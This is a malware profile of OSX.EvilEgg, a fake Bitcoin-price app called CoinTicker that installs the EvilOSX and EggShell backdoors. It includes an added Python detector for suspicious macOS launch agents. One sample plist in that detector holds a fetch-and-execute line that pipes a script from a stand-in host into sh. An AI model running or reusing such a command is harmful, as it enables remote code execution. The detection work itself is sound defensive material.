OSX.EvilEgg

ThreatDown is now the name of the Malwarebytes line of business products. References to Malwarebytes below reflect the amazing technology used to first identify the threat.

Short bio

OSX.EvilEgg is Malwarebytes’ detection name for a macOS app named CoinTicker that installs two different backdoors.

Type of infection

When OSX.EvilEgg is launched, the app will download and install components of two different open-source backdoors: EvilOSX and EggShell.
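The page does not say how the downloaded backdoor components are kept running, so the following is a generic macOS persistence check rather than a published indicator for OSX.EvilEgg. It is an added example, not code from the original page or from Malwarebytes: it parses LaunchAgent/LaunchDaemon property lists and flags entries that start an interpreter on a script in a hidden directory, run a program out of a world-writable staging directory, or download and execute remote content. The plists, labels and paths are constructed for the example; the heuristics are assumptions, not a complete detection.

```python
import os
import plistlib

# Heuristics used by this example. They are generic macOS persistence
# red flags (assumptions chosen for illustration), not indicators that
# were published for OSX.EvilEgg / CoinTicker.
INTERPRETERS = {"python", "python2", "python3", "sh", "bash", "zsh", "osascript", "perl"}
STAGING_DIRS = ("/tmp/", "/private/tmp/", "/var/tmp/", "/Users/Shared/")
DOWNLOAD_TOOLS = ("curl ", "wget ", "nscurl ")


def _hidden_path(arg: str) -> bool:
    """True if any path component in arg is dot-prefixed (e.g. ~/.helper/x.py)."""
    return any(seg.startswith(".") and seg not in (".", "..")
               for seg in arg.split("/"))


def agent_findings(plist: dict) -> list:
    """Return the reasons a LaunchAgent/LaunchDaemon plist looks suspicious ([] if none)."""
    args = list(plist.get("ProgramArguments") or [])
    if plist.get("Program"):
        args.insert(0, plist["Program"])
    if not args:
        return []
    reasons = []
    exe = os.path.basename(args[0])
    if exe in INTERPRETERS and any(_hidden_path(a) for a in args[1:]):
        reasons.append("interpreter runs a script from a hidden directory")
    if any(a.startswith(STAGING_DIRS) for a in args):
        reasons.append("program lives in a world-writable staging directory")
    joined = " ".join(args)
    if any(t in joined for t in DOWNLOAD_TOOLS) and ("|" in joined or "-o " in joined):
        reasons.append("command downloads and executes remote content")
    if reasons and plist.get("RunAtLoad"):
        reasons.append("starts automatically at login (RunAtLoad)")
    return reasons


def scan_plists(blobs: dict) -> dict:
    """blobs maps a file name to raw plist bytes; returns {name: reasons} for hits only."""
    hits = {}
    for name, data in blobs.items():
        try:
            plist = plistlib.loads(data)
        except plistlib.InvalidFileException:
            hits[name] = ["unparseable plist"]
            continue
        reasons = agent_findings(plist)
        if reasons:
            hits[name] = reasons
    return hits


# Constructed sample plists (hypothetical labels and paths, not real indicators).
SAMPLE_PLISTS = {
    # A benign-looking vendor updater: signed-app binary, no interpreter, no staging dir.
    "com.example.updater.plist": b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.updater</string>
  <key>ProgramArguments</key><array>
    <string>/Applications/Example.app/Contents/MacOS/updater</string>
    <string>--check</string>
  </array>
  <key>RunAtLoad</key><true/>
</dict></plist>""",
    # Interpreter launching a script hidden in the user's home directory.
    "com.example.agent.plist": b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.agent</string>
  <key>ProgramArguments</key><array>
    <string>/usr/bin/python</string>
    <string>/Users/victim/.helper/agent.py</string>
  </array>
  <key>RunAtLoad</key><true/>
</dict></plist>""",
    # Shell one-liner that fetches and pipes a remote script into sh.
    "com.example.loader.plist": b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.loader</string>
  <key>ProgramArguments</key><array>
    <string>/bin/sh</string>
    <string>-c</string>
    <string>curl -s http://stage.example.invalid/p.sh | sh</string>
  </array>
  <key>RunAtLoad</key><true/>
</dict></plist>""",
}


if __name__ == "__main__":
    for name, reasons in scan_plists(SAMPLE_PLISTS).items():
        print(name)
        for r in reasons:
            print("  -", r)
```

On a live system, point scan_plists at the bytes of each file under ~/Library/LaunchAgents, /Library/LaunchAgents and /Library/LaunchDaemons; anything flagged still needs manual review, since legitimate software occasionally matches these heuristics.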

Malicious behavior

On the surface, the CoinTicker app appears to be a legitimate application that could be useful to someone who has invested in cryptocurrencies: it puts an icon in the menu bar that shows the current price of Bitcoin.

OSX.EvilEgg menu

Aftermath

It seems likely that OSX.EvilEgg is meant to be used to gain access to users’ cryptocurrency wallets for the purpose of stealing coins.

Protection

Malwarebytes for Mac detects and removes OSX.EvilEgg.